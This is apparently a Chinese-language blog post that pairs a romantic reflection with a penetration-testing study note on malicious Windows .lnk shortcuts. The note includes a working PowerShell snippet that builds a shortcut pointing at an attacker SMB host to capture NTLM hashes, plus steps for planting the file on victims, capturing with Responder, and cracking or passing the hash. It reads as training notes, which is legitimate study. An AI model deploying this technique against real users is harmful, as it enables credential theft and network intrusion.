通往核心的路徑

喜歡一個人，是否只是因為—

「在他/她身上，看見了自己渴望成為的樣子？」

當我看見他的安靜專注、直接、勇敢和真實（或者，那種可以精準用 exploit 爆擊的樣子），

心裡就會產生一種奇怪的迷戀。

那感覺就像點擊了一個 .lnk，

它偽裝成再普通不過的捷徑，

卻在一瞬間把我送進了最深的核心。

我開始懷疑...

這條路徑指向的不只是他，

而是那個我渴望成為的未來版本的自己。

Hashtag: #所以，該下船了嗎？

技術筆記：惡意 .lnk (Windows Shortcut) 檔案

.lnk（捷徑檔）的原理

.lnk 檔是一個「Windows 快捷方式」。

在捷徑裡，我們可以指定 TargetPath，這個路徑可以是本機程式，也可以是網路 UNC 路徑（例如 \192.168.1.100\share\icon.png）。

當使用者「瀏覽」這個捷徑檔時 ...

Explorer 會嘗試載入它 → 去訪問那個 UNC 路徑 → 就會自動送出 NTLM 驗證請求。

所以攻擊流程可以是：

• 我們先架設一個伺服器（例如用 Responder 監聽 SMB）。

• 製作一個指向 \... 的 .lnk。

• 把這個 .lnk 丟到受害者能看到的地方（桌面、共享資料夾、Email 附件等）。

• 只要他一打開資料夾，不用點捷徑，就會嘗試存取那個圖示或目標路徑。

• NTLM hash 流到我們這裡，就能抓取或暴力破解。

PowerShell 範例：

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\10.10.14.1\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "只要瀏覽存放此檔案的目錄，就會觸發一個驗證請求。"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

解釋：

• TargetPath 指向我們的伺服器，所以可以把 10.10.14.1 換成你的 attackerIP。

• IconLocation 給它一個正常的圖，不要太可疑。

• 存檔 → 丟給目標。

工具輔助

• Lnkbomb：自動化幫我們生成很多 .lnk，省得手寫。

• Responder / Inveigh：用來接收並記錄目標傳回的 NTLM hash。

滲透流程中可以怎麼用？

如果發現 .scf 無法用了（Server 2019 / Windows 10+），就試試 .lnk。

放到共享資料夾、USB等，讓目標不小心打開。

其實這就是被動 hash 捕獲技術，通常下一步是：

離線破解 hash（用 hashcat）或 Pass-the-Hash。

小語

# 其實說實話，你喜歡誰已經不太重要了 XD
# 不過，未來的故事誰知道呢？

參考資源

HTB Academy - Windows Privilege Escalation - Interacting with Users：
https://academy.hackthebox.com/module/67/section/630